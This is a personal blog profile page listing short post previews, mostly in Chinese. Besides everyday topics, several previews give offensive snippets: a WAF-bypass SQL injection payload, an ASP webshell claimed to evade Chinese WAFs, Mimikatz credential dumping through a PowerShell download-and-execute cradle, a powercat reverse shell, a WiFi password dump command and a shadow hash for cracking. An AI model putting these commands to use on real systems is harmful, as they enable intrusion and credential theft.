Login
Discover
Waves
Communities
Write
Login
Signup
evil0x00
@evil0x00
43
Followers
270
Following
21
Follow
Email digest
Resource Credits
Available
Used
Created
2017-12-28 20:19
RSS Feed
Subscribe
Posts
Blog
Posts
Comments
Communities
Wallet
evil0x00
cn-curation
8y
这是我见过最帅的共享汽车
关于共享汽车的一些想法 这样的共享特斯拉 感觉怎么样 ,瞬间有一种高大上的感觉, 今天在公司楼下没想到真的见到了 这种共享汽车,瞬间有种不一样的感觉: 这年头 买不起车 还开不起共享汽车么,我这样的屌丝的福利到了,开这车出去接妹纸出去玩,也有种牛逼的感觉,虽然车上有共享两个字 但是还是不影响的哈哈。
$ 0.023
4
10
evil0x00
cn-curation
8y
Android 开发环境搭建
Android 开发环境搭建 由于被墙了 所以安装有点麻烦 但是也很简单只要你知道方法 如下: 先下载开发工具: 在这里下载android studio 很简单 困难的地方是安装sdk 官方给的下载SDK工具 是在这里下载 但是这个东西 我没搞懂 我用老的方法下载的 下载之后如下: 安装过之后 如果你不使用镜像的话 还是下载的非常慢的 在这里配置 配置如下就非常快了 等下载完就搞定了
$ 0.023
5
5
evil0x00
cmd
8y
MYSQL内联注释绕过WAF
MYSQL内联注释绕过WAF 前言: 现在基本上是个网站都设置个waf ,一般都是通过一些注释啊 编码绕过 一些注释如下: //, -- , /**/, #, --+, -- -, ;%00 这些都需要自己收集 积累 不过这些大多都不能用 内联注释还是可以用的 id=1/*!UnIoN*/SeLeCT /*! code */来绕过
evil0x00
cn-curation
8y
分享一个查看本机连接WiFi的工具
获取本机连接WiFi记录 1.利用环境 a.windows b.无线网卡 代码如下: for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear 获取到的记录如下:
evil0x00
cmd
8y
Mimikatz Get Local Credentials
Mimikatz Get Local Credentials when you get shell,maybe you will need this! Mimikatz Get Local Credentials First: Show Credentials dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* 2.Second: Get
evil0x00
cmd
8y
SQLMap tamper
space2comment 进行WAF绕过测试的时候 " " 转换成 "/**/" 但是 这个也会被注释 -- - 注释为 --/**/- 就会导致出错 那么可以更改脚本为: #!/usr/bin/env python """ Copyright (c) 2006-2018 sqlmap developers ( See the
evil0x00
cmd
8y
ASP webshell
ASP webshell 正文来了 asp 绕过waf <% <!--"--> execute request("LandGrey") %> 原理就是通过注释 绕过 D盾 以及 安全狗 亲测 现在可用
evil0x00
cn
8y
发现一篇良心文章 #EDU&BAI任意转走账户Token事件回顾
EDU&BAI任意转走账户Token事件回顾 文章地址:
evil0x00
cn
8y
关于USDT 虚假转账安全⻛险分析的看法
关于USDT 虚假转账安全⻛险分析的看法 0x01: 前言: 这两天出差 回来看到这个文章 原文链接 「慢雾区」公众号发布 0x02: 简单介绍 如果⼀笔 USDT 的交易合法的,要⾄少满⾜以下 2 个条件: 1.要通过⽐特币的交易来构造,要符合⽐特币的余额验证(BTC)及交易规则验证 2.要通过 USDT ⾃⼰的余额(USDT)验证 被 USDT 冻结的地址发起的交易也会被标记为⽆效交易。
evil0x00
cn
8y
狗子:你放开我好吗???
哈哈 没想到还有这种操作吧 狗子:你放开我好吗???
evil0x00
cn
8y
一入币圈深似海
一入币圈深似海 从此生死两茫茫啊
evil0x00
cmd
8y
Fiddler使用笔记
Fiddler使用笔记 0x01: 基本使用教程 Fiddler左下角的黑框是用来输入命令的地方。叫QuickExec 常用命令如下: help 打开官方的使用页面介绍,所有的命令都会列出来 cls 清屏 (Ctrl+x 也可以清屏) select 选择会话的命令 ?.png 用来选择png后缀的图片 bpu 截获request 输入断点的两种方法。 * 1. 打开Fiddler 点击Rules->
evil0x00
cmd
8y
Powershell调用mimikatz dump 密码
powershell调用mimikatz dump 密码 脚本地址: 国外大神clymb3r写的一个powershell脚本将mimikatz注入到内存调用logonPasswords获取密码,使用起来相当轻便。 powershell "IEX (New-Object Net.WebClient).DownloadString(' Invoke-Mimikatz -DumpCreds"
evil0x00
cmd
8y
这次比赛 骑士输了 詹姆斯赢了
这次比赛 骑士输了 詹姆斯赢了 今天这场比赛在第四场的时候 骑士队 有三个肯能性 去结束比赛 ,但是确因为JR的失误 导致了加时 输掉了比赛,身边的朋友,以及朋友圈都在骂JR 。 的确是JR的过错 ,不过试想就算是JR没有抢到这个篮板 ,也不会有人说什么,不会有这么多骂声。 这场比赛 詹姆士打出了王者风范,但是队友实在是带不动 现在开始怀念欧文 ,希望欧文能在下一场 赶紧回来加入比赛吧 勇士阵容真的是太强大了
evil0x00
cmd
8y
linux /etc/shadow破解方式一
shadow 格式 root:$1$9GBfNwzw$dRF4w0Rw1PzTc.20HLYbi/:17362:0:99999:7::: bin:*:17112:0:99999:7::: daemon:*:17112:0:99999:7::: adm:*:17112:0:99999:7::: lp:*:17112:0:99999:7::: sync:*:17112:0:99999:7:::
evil0x00
cmd
8y
powercat反弹shell
powercat反弹shell powercat就是powershell版的Netcat github如下: powercat github 如何使用 攻击者: nc -lvp 6666 或者使用powercat监听: powercat -l -p 6666 目标机反弹cmd shell: powershell IEX (New-Object System.Net.Webclient).DownloadString
evil0x00
cmd
8y
Centos 6.5安装nmap
一直在本地开虚拟机安装使用namp 加上动态vpn用起来挺方便的 但是每次开虚拟机太麻烦了 就找台搬瓦工的vps安装个nmap 命令如下: 87 yum install git autoconf gcc gcc-c++ make automake -y 88 cd /usr/src 89 git clone 90 cd nmap 91 ./configure 104 make 105 make install
evil0x00
cn
8y
想当年我什么都不服 直到遇到了招商银行
想当年我什么都不服 直到遇到了招商银行 本来以为这玩意是恶搞 没想到是真的。服了服了,这次我赵日天真的服了.
evil0x00
cn
8y
GIF录制工具
GIF录制工具 今天想要录个GIF找了半天才找到一款顺手的工具 很顺手啊 工具名字叫LICEcapLICEcap 官方网址: 当然想要绿色版的 可以私聊我 邮箱发你!
evil0x00
cmd
8y
DEFCON2018 CHINA(part:0x01)
DEFCON2018 CHINA(part:0x01) DEFCON CHINA 行 已经结束两天了 总与有时间研究下大佬们分享的文章了。 这次要学习的是 Ruben Boonen(b33f)大佬分享的内容 大佬GitHub 这次b33f大佬的议题是: UAC 0day ,all day! 用户账户控制,每天都是0day。 0x01: 一些基本概念 User Account Control AppLocker
← Latest
Older →